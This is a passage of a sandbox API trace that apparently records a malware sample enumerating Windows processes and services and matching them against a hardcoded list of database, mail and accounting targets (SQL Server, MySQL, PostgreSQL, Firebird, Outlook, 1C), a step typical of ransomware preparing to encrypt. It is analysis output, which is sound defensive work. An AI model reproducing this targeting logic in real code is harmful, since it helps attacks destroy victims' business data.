	[0162.466] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0162.466] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0162.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0162.466] lstrlenW (lpString="UxSms") returned 5
	[0162.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0162.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0162.467] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0162.467] lstrlenW (lpString="WdiServiceHost") returned 14
	[0162.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0162.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0162.467] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0162.467] lstrlenW (lpString="WdiSystemHost") returned 13
	[0162.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0162.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0162.467] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0162.467] lstrlenW (lpString="Winmgmt") returned 7
	[0162.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0162.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0162.467] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0162.467] lstrlenW (lpString="WPDBusEnum") returned 10
	[0162.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0162.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0162.467] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0162.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0162.467] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0162.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b8
	[0162.469] Process32FirstW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0162.469] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0162.469] lstrlenW (lpString="System") returned 6
	[0162.470] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0162.470] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0162.470] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0162.470] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0162.470] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0162.470] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0162.470] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0162.470] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0162.470] lstrlenW (lpString="smss.exe") returned 8
	[0162.470] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0162.470] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0162.470] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0162.470] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0162.470] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0162.470] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0162.470] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0162.470] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0162.471] lstrlenW (lpString="csrss.exe") returned 9
	[0162.471] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0162.471] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0162.471] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0162.471] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0162.471] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0162.471] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0162.471] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0162.471] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0162.471] lstrlenW (lpString="wininit.exe") returned 11
	[0162.471] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0162.471] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0162.471] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0162.471] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0162.471] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0162.471] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0162.471] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0162.471] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0162.472] lstrlenW (lpString="csrss.exe") returned 9
	[0162.472] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0162.472] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0162.472] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0162.472] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0162.472] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0162.472] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0162.472] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0162.472] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0162.472] lstrlenW (lpString="winlogon.exe") returned 12
	[0162.472] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0162.472] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0162.472] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0162.472] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0162.472] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0162.473] lstrlenW (lpString="services.exe") returned 12
	[0162.473] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0162.473] lstrlenW (lpString="lsass.exe") returned 9
	[0162.473] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0162.473] lstrlenW (lpString="lsm.exe") returned 7
	[0162.473] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0162.474] lstrlenW (lpString="svchost.exe") returned 11
	[0162.474] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0162.474] lstrlenW (lpString="svchost.exe") returned 11
	[0162.474] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0162.474] lstrlenW (lpString="svchost.exe") returned 11
	[0162.474] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0162.475] lstrlenW (lpString="svchost.exe") returned 11
	[0162.475] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0162.475] lstrlenW (lpString="svchost.exe") returned 11
	[0162.475] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0162.475] lstrlenW (lpString="audiodg.exe") returned 11
	[0162.475] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0162.476] lstrlenW (lpString="svchost.exe") returned 11
	[0162.476] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0162.476] lstrlenW (lpString="svchost.exe") returned 11
	[0162.476] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0162.476] lstrlenW (lpString="spoolsv.exe") returned 11
	[0162.476] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0162.477] lstrlenW (lpString="svchost.exe") returned 11
	[0162.477] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0162.477] lstrlenW (lpString="taskhost.exe") returned 12
	[0162.477] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0162.477] lstrlenW (lpString="userinit.exe") returned 12
	[0162.477] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0162.478] lstrlenW (lpString="dwm.exe") returned 7
	[0162.478] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0162.478] lstrlenW (lpString="explorer.exe") returned 12
	[0162.478] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0162.478] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0162.478] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0162.478] lstrlenW (lpString="reader_sl.exe") returned 13
	[0162.479] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0162.479] lstrlenW (lpString="drvinst.exe") returned 11
	[0162.479] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0162.479] lstrlenW (lpString="taskhost.exe") returned 12
	[0162.479] Process32NextW (in: hSnapshot=0x3b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 0
	[0162.479] CloseHandle (hObject=0x3b8) returned 1
	[0162.480] Sleep (dwMilliseconds=0x1f4) 
	[0163.286] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0163.297] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0163.309] GetLastError () returned 0xea
	[0163.309] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x113e) returned 0x7ba6360
	[0163.309] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x113e, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0163.321] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0163.332] lstrlenW (lpString="Appinfo") returned 7
	[0163.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0163.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0163.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0163.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0163.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0163.332] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0163.343] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0163.343] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0163.343] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0163.343] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0163.343] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0163.344] lstrlenW (lpString="AudioSrv") returned 8
	[0163.344] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0163.344] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0163.344] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0163.344] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0163.344] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0163.344] lstrlenW (lpString="BFE") returned 3
	[0163.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0163.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0163.355] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0163.355] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0163.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0163.355] lstrlenW (lpString="CryptSvc") returned 8
	[0163.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0163.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0163.355] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0163.355] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0163.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0163.355] lstrlenW (lpString="CscService") returned 10
	[0163.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0163.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0163.355] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0163.355] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0163.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0163.355] lstrlenW (lpString="DcomLaunch") returned 10
	[0163.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0163.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0163.355] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0163.355] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0163.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0163.355] lstrlenW (lpString="Dhcp") returned 4
	[0163.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0163.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0163.356] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0163.356] lstrlenW (lpString="Dnscache") returned 8
	[0163.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0163.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0163.356] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0163.356] lstrlenW (lpString="DPS") returned 3
	[0163.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0163.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0163.356] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0163.356] lstrlenW (lpString="eventlog") returned 8
	[0163.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0163.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0163.356] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0163.356] lstrlenW (lpString="EventSystem") returned 11
	[0163.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0163.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0163.356] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0163.356] lstrlenW (lpString="gpsvc") returned 5
	[0163.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0163.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0163.356] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0163.356] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0163.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0163.357] lstrlenW (lpString="iphlpsvc") returned 8
	[0163.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0163.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0163.357] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0163.357] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0163.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0163.357] lstrlenW (lpString="LanmanServer") returned 12
	[0163.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0163.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0163.357] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0163.357] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0163.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0163.357] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0163.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0163.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0163.357] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0163.357] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0163.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0163.357] lstrlenW (lpString="lmhosts") returned 7
	[0163.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0163.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0163.357] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0163.357] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0163.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0163.357] lstrlenW (lpString="MMCSS") returned 5
	[0163.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0163.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
